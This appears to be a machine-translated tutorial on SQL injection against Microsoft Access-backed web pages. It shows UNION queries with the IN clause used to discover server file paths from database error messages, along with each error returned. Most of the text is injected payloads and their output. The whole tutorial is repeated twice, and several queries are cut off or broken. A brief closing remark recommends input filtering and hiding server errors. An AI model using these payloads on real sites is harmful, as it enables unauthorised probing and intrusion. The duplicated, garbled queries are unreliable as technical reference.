SQL injection is now popular, and many new Injection methods have been discovered. Using system errors to explode the path is a hot topic, and today I will join in the fun.
This test is suitable for ACCESS (because the MS SQL query does not have a specified path), there is a table that can import the source database into the target database.
For example: (admin table)—〉
If you want to create a new worksheet in an existing external database, you can use the IN keyword. If the external database does not exist or the data table already exists, the SELECT INTO statement will return an error message.
SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers。
Can you use the subquery function to turn it into:
Generally, there are vulnerable statements, such as select * from news where id"), and there is injection. The following demonstration uses a set of tests using select * from news whre id=”&request("id") . For convenience, it is directly converted to the status during SQL execution:
select * from news where id=3 and SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers
After testing, the function of the guide cannot be implemented in subqueries. The road was blocked again. Suddenly I thought of UNION, merge operator, and see if I can use it.
Note: The UNION operator (using ACCESS)
Although UNION’s operation can also be regarded as a merge query, we cannot technically regard it as a join. It is mentioned because it can synthesize data obtained from multiple sources into a result form, which is similar to certain types of joins. UNION operations are generally used to combine data from forms, SELECT statements or queries and omit any duplicate rows. All data sources must have the same number of domains, but these domains do not have to be of the same data type. Let's assume we have an employee form with the same structure as the customer work form, then we want to merge the two worksheets to get a list of name and email address information.
SELECT [Last Name], [First Name], Email FROM tblCustomers UNION SELECT [Last Name], [First Name], Email FROM tblEmployees
The UNION operation does not display any records that appear repeatedly in both forms. The query statement using UNION must be equal to the query statement field column before UNION, such as:
select id,title from news where id=3 UNION select * from admin
The fields inquiry vary, return:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two data tables or queries selected in the joint query does not match.
Query statements can be avoided: select id, title from news where id=3 UNION select 1,1 from admin As long as the number of 1 placed is equal to the field, query can also be implemented.
See if the statement can be turned into:
select * from news where id=3 Union SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers
return:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] Action query cannot be used as the source of the row.
As a result, it still failed. Because UNION only applies to query combinations. UNION cannot follow the action. Maybe this road is not working, but I still feel unwilling to accept it.
Try to use:
se
lect * from news where id=3 Union select * from
return:
Microsoft JET Database Engine Error '80004005' File Not Found 'C:\WINNT\system32\'.
This proves that the path can be successfully tested just like using select * from news where id=3 and 0<>(select count(*) from ) . But think about using this method ACCESS always detects the suffix MDB by default, although there are ways to avoid it using the above. It's too troublesome.
So I was wondering if other methods could be used to implement it more simply. I recalled the SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers. Can't the IN keyword point to the path file name? Can it be classified as used?
Next test:
select * from news where id=3 union select * from admin in 'c:\'
System prompts:
Microsoft JET Database Engine Error '80004005' File not found 'c:\'.
use:
select * from news where id=3 union select * from admin in 'c:\winnt\system32\'
System prompts:
Microsoft JET Database Engine Error '80004005' Microsoft Jet 'Database Engine cannot open the file 'c:\winnt\system32\'. It has been opened exclusively by other users or does not have permission to view data.
This method is more concise than using the queries of and 0<>(select count(*) from admin) and the guess is that the file with the MDB suffix is correct. The guessed path and file name are correct and the information will be displayed normally. But if you are guessing non-MDB files, it looks like this:
implement:
select * from news where id=3 union select * from admin in 'e:\www\include\'
return:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'e:\www\include\'
Prove that the guessed path and file are correct.
Later on, due to the shortcomings of ACCESS itself, SQL INJECTION methods have emerged one after another. But on the one hand, it is because programmers do not pay attention to prevention and prevent carelessness when writing programs. Detailed filtering of SQL language with passed values is at least a gate that blocks SQL INJECTION. ACCESS itself solves defects, and many French holes are hard to guard against. It is recommended that the server error information be created and the page will appear if the server errors. In this way, there is no reference error information, and only these articles are used as reference.
This test is suitable for ACCESS (because the MS SQL query does not have a specified path), there is a table that can import the source database into the target database.
For example: (admin table)—〉
If you want to create a new worksheet in an existing external database, you can use the IN keyword. If the external database does not exist or the data table already exists, the SELECT INTO statement will return an error message.
SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers。
Can you use the subquery function to turn it into:
Generally, there are vulnerable statements, such as select * from news where id"), and there is injection. The following demonstration uses a set of tests using select * from news whre id=”&request("id") . For convenience, it is directly converted to the status during SQL execution:
select * from news where id=3 and SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers
After testing, the function of the guide cannot be implemented in subqueries. The road was blocked again. Suddenly I thought of UNION, merge operator, and see if I can use it.
Note: The UNION operator (using ACCESS)
Although UNION’s operation can also be regarded as a merge query, we cannot technically regard it as a join. It is mentioned because it can synthesize data obtained from multiple sources into a result form, which is similar to certain types of joins. UNION operations are generally used to combine data from forms, SELECT statements or queries and omit any duplicate rows. All data sources must have the same number of domains, but these domains do not have to be of the same data type. Let's assume we have an employee form with the same structure as the customer work form, then we want to merge the two worksheets to get a list of name and email address information.
SELECT [Last Name], [First Name], Email FROM tblCustomers UNION SELECT [Last Name], [First Name], Email FROM tblEmployees
The UNION operation does not display any records that appear repeatedly in both forms. The query statement using UNION must be equal to the query statement field column before UNION, such as:
select id,title from news where id=3 UNION select * from admin
The fields inquiry vary, return:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two data tables or queries selected in the joint query does not match.
Query statements can be avoided: select id, title from news where id=3 UNION select 1,1 from admin As long as the number of 1 placed is equal to the field, query can also be implemented.
See if the statement can be turned into:
select * from news where id=3 Union SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers
return:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] Action query cannot be used as the source of the row.
As a result, it still failed. Because UNION only applies to query combinations. UNION cannot follow the action. Maybe this road is not working, but I still feel unwilling to accept it.
Try to use:
se
lect * from news where id=3 Union select * from
return:
Microsoft JET Database Engine Error '80004005' File Not Found 'C:\WINNT\system32\'.
This proves that the path can be successfully tested just like using select * from news where id=3 and 0<>(select count(*) from ) . But think about using this method ACCESS always detects the suffix MDB by default, although there are ways to avoid it using the above. It's too troublesome.
So I was wondering if other methods could be used to implement it more simply. I recalled the SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers. Can't the IN keyword point to the path file name? Can it be classified as used?
Next test:
select * from news where id=3 union select * from admin in 'c:\'
System prompts:
Microsoft JET Database Engine Error '80004005' File not found 'c:\'.
use:
select * from news where id=3 union select * from admin in 'c:\winnt\system32\'
System prompts:
Microsoft JET Database Engine Error '80004005' Microsoft Jet 'Database Engine cannot open the file 'c:\winnt\system32\'. It has been opened exclusively by other users or does not have permission to view data.
This method is more concise than using the queries of and 0<>(select count(*) from admin) and the guess is that the file with the MDB suffix is correct. The guessed path and file name are correct and the information will be displayed normally. But if you are guessing non-MDB files, it looks like this:
implement:
select * from news where id=3 union select * from admin in 'e:\www\include\'
return:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'e:\www\include\'
Prove that the guessed path and file are correct.
Later on, due to the shortcomings of ACCESS itself, SQL INJECTION methods have emerged one after another. But on the one hand, it is because programmers do not pay attention to prevention and prevent carelessness when writing programs. Detailed filtering of SQL language with passed values is at least a gate that blocks SQL INJECTION. ACCESS itself solves defects, and many French holes are hard to guard against. It is recommended that the server error information be created and the page will appear if the server errors. In this way, there is no reference error information, and only these articles are used as reference.